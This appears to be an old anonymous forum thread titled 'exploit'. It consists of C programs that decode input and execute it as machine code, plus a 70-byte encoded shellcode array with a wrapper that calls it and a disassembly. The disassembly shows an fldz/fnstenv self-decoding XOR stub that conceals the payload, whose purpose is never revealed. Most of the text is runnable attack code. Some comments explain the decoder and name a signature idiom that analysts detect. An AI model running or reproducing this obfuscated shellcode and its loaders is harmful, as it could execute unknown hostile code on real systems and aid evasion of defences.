Name:
Anonymous
2010-11-16 17:30
exploit
#include <stdio.h>
#include <string.h>
#define MAX 0xFF
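/*
 * Decode argv[1] in place and transfer control to the decoded bytes.
 *
 * Each byte b at index i is replaced by (b - (i % 0xF)) ^ i, after which the
 * buffer is called as a function taking no arguments.
 *
 * Returns 1 when the program is not given exactly one argument, and 0 if the
 * called bytes return normally.
 *
 * Security note: whatever argv[1] decodes to runs with this process's
 * privileges. The buffer is an automatic (stack) array, so on a platform
 * that enforces a non-executable stack the call faults instead.
 */
int main(int argc, char **argv)
{
    if (argc != 2)
        return 1;

    char buf[MAX];
    size_t i;

    /*
     * strncpy() does not write a terminator when the source holds MAX or
     * more bytes; the strlen() in the loop below would then read past the
     * end of buf. Copy at most MAX - 1 bytes and terminate explicitly.
     */
    strncpy(buf, argv[1], MAX - 1);
    buf[MAX - 1] = '\0';

    /*
     * strlen() is evaluated on every pass, so a byte that decodes to 0
     * shortens the string and ends the loop; bytes after it stay undecoded.
     */
    for (i = 0; i < strlen(buf); ++i)
        buf[i] = (buf[i] - (i % 0xF)) ^ i;

    /*
     * Converting an object pointer to a function pointer is not defined by
     * ISO C; it only works where the platform allows it.
     */
    ((void(*)())buf)();
    return 0;
}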
Name:
Anonymous
2010-11-17 7:41
u mena
1
/* reverse.c
*/
#include <stdio.h>
#include <string.h>
/*
 * 70 bytes in encoded form. main() below prints each byte after applying
 * (b - (i % 0xF)) ^ i, where i is the byte's index in this array.
 *
 * NOTE(review): the element type is plain char, whose signedness is
 * implementation-defined, and several initialisers exceed 0x7f. main() casts
 * the transformed value to unsigned char before printing, so the printed
 * bytes should not depend on that; unsigned char would state the intent.
 */
char shellcode[] = {
0x6a, 0x0e, 0x5d, 0xdd, 0xee, 0xe1, 0x78, 0x2a, 0x04, 0x5b, 0x95,
0x83, 0x2b, 0x53, 0x1b, 0x98, 0xac, 0x94, 0xfc, 0xf3, 0xfb, 0xe7,
0x3e, 0x27, 0xe0, 0x45, 0x0e, 0x8a, 0xf0, 0x99, 0x36, 0x96, 0x52,
0xf5, 0x4a, 0x58, 0xe1, 0xa5, 0x0d, 0x14, 0xe7, 0x06, 0x1b, 0xae,
0x66, 0xc4, 0x8e, 0x23, 0xaa, 0x8e, 0x7e, 0x48, 0xd5, 0xb6, 0x59,
0x50, 0xd4, 0xae, 0x6b, 0x5e, 0xc4, 0xec, 0x12, 0x3f, 0x84, 0xae,
0x86, 0xa8, 0x26, 0x87
};
/*
 * Print every byte of the shellcode array after the per-index transform
 * (b - (i % 0xF)) ^ i, as "0x%02x " tokens, ten per output line.
 *
 * Nothing is executed here; the program only writes the transformed bytes to
 * stdout so they can be inspected.
 */
int main(void)
{
    int pos = 0;

    while (pos < sizeof shellcode) {
        /* Keep only the low eight bits, exactly as the printed form needs. */
        unsigned char plain =
            (unsigned char)((shellcode[pos] - (pos % 0xF)) ^ pos);

        printf("0x%02x ", plain);

        /* Break the line after every tenth value. */
        if (pos % 10 == 9)
            putchar('\n');
        ++pos;
    }

    putchar('\n');
    return 0;
}
2
/* wrap.c
*/
/*
 * 70 bytes that main() below calls directly as code.
 *
 * Going by the disassembly posted in step 3, the first 22 bytes
 * (0x6a ... 0xe2, 0xf4) form a loop that XORs the remaining 48 bytes in
 * place before control reaches them, so the tail of this array is not
 * meaningful machine code as listed here.
 *
 * Because that loop writes into the array it is running from, the memory has
 * to be both writable and executable; where W^X / NX is enforced the call
 * faults.
 */
char shellcode[] = {
0x6a, 0x0c, 0x59, 0xd9, 0xee, 0xd9, 0x74, 0x24, 0xf4, 0x5b,
0x81, 0x73, 0x13, 0x4b, 0x03, 0x97, 0xbb, 0x83, 0xeb, 0xfc,
0xe2, 0xf4, 0x21, 0x08, 0xcf, 0x22, 0x19, 0x65, 0xff, 0x96,
0x28, 0x8a, 0x70, 0xd3, 0x64, 0x70, 0xff, 0xbb, 0x23, 0x2c,
0xf5, 0xd2, 0x25, 0x8a, 0x74, 0xe9, 0xa3, 0x0e, 0x97, 0xbb,
0x4b, 0x71, 0xfa, 0x9b, 0x66, 0x71, 0xf1, 0x9b, 0x64, 0x6b,
0xf8, 0xd6, 0x2e, 0x03, 0xc0, 0xe8, 0xc2, 0xe2, 0x5a, 0x3b
};
/*
 * Treat the shellcode array as a function taking no arguments and call it.
 *
 * The object-pointer to function-pointer conversion is not defined by ISO C.
 * shellcode is an initialised file-scope array, which toolchains normally
 * place in a data section; where data pages are non-executable the call
 * faults rather than running the bytes.
 */
int main(void)
{
    void (*entry)() = (void (*)())shellcode;

    entry();
    return 0;
}
3
# Linear disassembly of the 70-byte array from wrap.c (0x8049580-0x80495c5).
# Only the first 22 bytes are real instructions as shown; they are a
# self-decoding loop:
#   push $0xc / pop %ecx   -> loop counter, 12 passes
#   fldz / fnstenv / pop   -> fnstenv stores the FPU environment at
#                             -0xc(%esp); its instruction-pointer field sits
#                             0xc bytes in, i.e. at (%esp), so the pop loads
#                             the address of the fldz (0x8049583) into %ebx
#   xorl key,0x13(%ebx)    -> 0x8049583 + 0x13 = 0x8049596, the first byte
#                             after the loop instruction
#   sub $-4,%ebx / loop    -> advance four bytes and repeat
# 12 passes x 4 bytes = 48 bytes, which is exactly 0x8049596-0x80495c5.
# For analysts: the fldz/fnstenv/pop sequence (d9 ee d9 74 24 f4 5b) is a
# position-finding idiom that shellcode signatures commonly match on.
08049580 <shellcode>:
8049580: 6a 0c push $0xc
8049582: 59 pop %ecx
8049583: d9 ee fldz
8049585: d9 74 24 f4 fnstenv -0xc(%esp)
8049589: 5b pop %ebx
804958a: 81 73 13 4b 03 97 bb xorl $0xbb97034b,0x13(%ebx)
8049591: 83 eb fc sub $0xfffffffc,%ebx
8049594: e2 f4 loop 804958a <shellcode+0xa>
# Everything from here on is the still-encoded region that the loop above
# rewrites at run time. The mnemonics below are what the disassembler makes
# of the encoded bytes (note the stray prefixes, iret and far-off call
# target); they do not describe what executes after decoding.
8049596: 21 08 and %ecx,(%eax)
8049598: cf iret
8049599: 22 19 and (%ecx),%bl
804959b: 65 ff 96 28 8a 70 d3 call *%gs:-0x2c8f75d8(%esi)
80495a2: 64 fs
80495a3: 70 ff jo 80495a4 <shellcode+0x24>
80495a5: bb 23 2c f5 d2 mov $0xd2f52c23,%ebx
80495aa: 25 8a 74 e9 a3 and $0xa3e9748a,%eax
80495af: 0e push %cs
80495b0: 97 xchg %eax,%edi
80495b1: bb 4b 71 fa 9b mov $0x9bfa714b,%ebx
80495b6: 66 data16
80495b7: 71 f1 jno 80495aa <shellcode+0x2a>
80495b9: 9b fwait
80495ba: 64 fs
80495bb: 6b f8 d6 imul $0xffffffd6,%eax,%edi
80495be: 2e cs
80495bf: 03 c0 add %eax,%eax
80495c1: e8 c2 e2 5a 3b call 435f7888 <_end+0x3b5ae2b8>